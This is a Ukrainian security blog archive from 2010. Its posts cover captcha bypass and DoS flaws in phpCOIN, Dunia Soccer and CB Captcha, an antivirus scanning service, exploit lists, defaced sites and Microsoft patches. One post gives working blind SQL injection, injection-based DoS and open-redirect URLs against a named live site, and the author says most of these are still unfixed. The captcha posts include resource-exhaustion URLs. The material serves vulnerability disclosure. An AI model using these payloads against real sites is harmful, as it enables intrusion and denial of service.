Добірка уразливостей

15:38 02.04.2010

В даній добірці уразливості в веб додатках:

Уразливості в phpCOIN

23:51 01.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі phpCOIN. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі phpCOIN 1.6.5 та попередні версії.

Антивірус для сайтів від Symantec

22:47 01.04.2010

Продовжуючи тему антивірусів для сайтів, розповім вам про ще один подібний сервіс, який я знайшов декілька днів тому. Це Norton Safe Web від Symantec. Це ще один конкурент моїй Web VDS.

Компанія Symantec відомий розробник антивірусних продуктів, тому подібний публічний сервіс від даної компанії мав коли-небудь з’явитися. Відповідно до знайденої мною інформації - даний сервіс Symantec запустила ще в 2008 році (у вигляді бета версії і зараз це вже офіційна версія сервісу). Це лише я натрапив на цей сервіс нещодавно :-) .

На відміну від інших антивірусних компаній, таких як McAfee (що надає свою технологію Yahoo) та Sophos (що надає свою технологію Yandex), Symantec не стала надавати іншим компаніям власну технологію по виявленню вірусів на сайтах. І зробила власний веб сервіс, подібно до Google, який в минулому році зробив свій Safe Browsing публічним (при тому, що Гугл розробив свою технологію ще в 2006 році).

Щоб скористатися сервісом Norton Safe Web, потрібно зайти на даний сайт і вказати URL в рядку пошуку, або напряму зайти на сторінку звіту про сайт (вказавши URL):

http://safeweb.norton.com/report/show?url=site.com

Можете подитивитися на роботу сервіса на прикладі norton.com:

http://safeweb.norton.com/report/show?url=norton.com

Зазначу, що в Safe Web недостатньо велика база перевірених сайтів - вона на порядок менша ніж у Safe Browsing Гугла.

Уразливості на bezpeka.com

19:14 01.04.2010

30.09.2009

У лютому, 06.02.2009, я знайшов SQL DB Structure Extraction, SQL Injection, Denial of Service та Redirector уразливості на секюріті сайті http://bezpeka.com. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на bezpeka.com.

Детальна інформація про уразливості з’явиться пізніше.

01.04.2010

Раніше сайт працював на домені bezpeka.com, а зараз лише на www.bezpeka.com.

SQL DB Structure Extraction:

http://www.bezpeka.com/ru/redirect/

http://www.bezpeka.com/ru/redirect/?bid=’

http://www.bezpeka.com/ru/redirect/?bcat=’

SQL Injection (сліпа):

http://www.bezpeka.com/ru/redirect/?bid=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)

DoS (через SQL Injection):

http://www.bezpeka.com/ru/redirect/?bid=1%20and%20benchmark(1000000,md5(now()))%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=1%20and%20benchmark(1000000,md5(now()))%23

Redirector:

http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua

З даних уразливостей виправлені лише перша та третя SQL DB Structure Extraction та Redirector (і то неякісно). А всі інші уразливості досі не виправлені.

Остання уразливість знову працює при невеликій зміні URL запиту:

Redirector:

http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua&bid=1&bcat=1

Добірка експлоітів

15:29 01.04.2010

В даній добірці експлоіти в веб додатках:

  • SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit (деталі)
  • Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability (деталі)
  • Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit (loop) (деталі)
  • BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities (деталі)
  • Re-Script v.0.99 Beta ( listings.php op ) SQL Injection Vulnerability (деталі)
  • Basic PHP Events Lister 2 Reset Admin Pass/Add Admin Vulns (деталі)
  • SEO-CMS 1.3 (body.php) Remote File Inclusion Vulnerability (деталі)
  • osCommerce Online Merchant 2.2 RC2a Code Execution Exploit (деталі)
  • Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability (деталі)
  • Joomla Component Agora 3.0.0b (com_agora) LFI Vulnerability (деталі)

Уразливість в CB Captcha для Joomla і Mambo

23:56 31.03.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation уразливість в плагіні CB Captcha (plug_cbcaptcha) для компонента Community Builder (com_comprofiler) для Joomla і Mambo. Про що найближчим часом сповіщу розробників.

Даний плагін базується на скрипті капчі CaptchaSecurityImages.php і про уразливості в CaptchaSecurityImages я вже розповідав. І в плагіні plug_cbcaptcha виправлені всі Insufficient Anti-automation та Denial of Service уразливості з оригінального скрипта, окрім однієї.

Insufficient Anti-automation:

В плагіні можливий обхід капчі з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC. Використовуючи даний метод, можна обходити захист посилаючи один і той же код капчі.

Це може бути використано на всіх сторінках, де використовується даний плагін. Зокрема на сторінці реєстрації, формі втрати паролю та формі втрати емайлу.

Уразливі CB Captcha 1.0.2 та попередні версії, CB Captcha 2.2 та попередні версії.

Зазначу, що версії 1.x та 2.x зроблені різними авторами та мають чимало відмінностей. Зокрема в версії 2.x додана аудіо версія капчі, серед файлів плагіна зокрема з’явився captchaindex.php (який є головним скриптом плагіна, замість cb.captcha.php). Та окрім трьох вищезгаданий форм, капча також захищає контактну форму (при наявності компонента CB Contact 1.1) та форму логіна (при наявності модуля логіна CB 1.2).

Похакані сайти №90

22:43 31.03.2010

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://uspixm.com (хакерами з UAH-Crew)
  • http://www.kompan.com.ua (хакерами з KING SOLUTIONZ)
  • http://mirabela.com.ua (хакером RedGuard) - 20.03.2010, зараз сайт не працює
  • http://www.compsysnet.chnu.edu.ua (хакером Top 511) - 23.03.2010, зараз сайт не працює (виводиться пуста сторінка)
  • http://artalexdm.com.ua (хакером SALDIRAY) - 09.01.2010, зараз сайт вже виправлений адмінами

До речі, у групи UAH-Crew (United Albania Hackers) цікава назва - нагадує українську гривню (UAH) :-) .

Березневий вівторок патчів від Microsoft

19:23 31.03.2010

В березні місяці Microsoft випустила 8 патчів. Що значно менше ніж у лютому.

У березневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 8 бюлетеней по безпеці, що закривають 8 уразливостей. Дані патчі стосуються різних версій Windows та офісних додатків. Зокрема будуть виправлені уразливості в Windows Movie Maker та в Excel.

Уразливості, що одержали статус “важливих”, за певних умов можуть використовуватися для виконання довільного коду на віддаленому комп’ютері.

Добірка уразливостей

15:35 31.03.2010

В даній добірці уразливості в веб додатках:

  • ToutVirtual VirtualIQ Multiple Vulnerabilities (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-003 (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-002 (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-001 (деталі)
  • Oracle Updates for Multiple Vulnerabilities (деталі)
  • Multiple security issues in Cute News and UTF-8 Cute News (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows Running PHP and OpenSSL, Remote Cross Site Scripting (XSS), Unauthorized Access (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • AssetsSoSimple supplier_admin.php Supplier Field XSS (деталі)

Уразливості в Dunia Soccer

23:51 30.03.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі Dunia Soccer. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/class/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі як через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше, так і з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC.

DoS:

http://site/class/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі всі версії Dunia Soccer.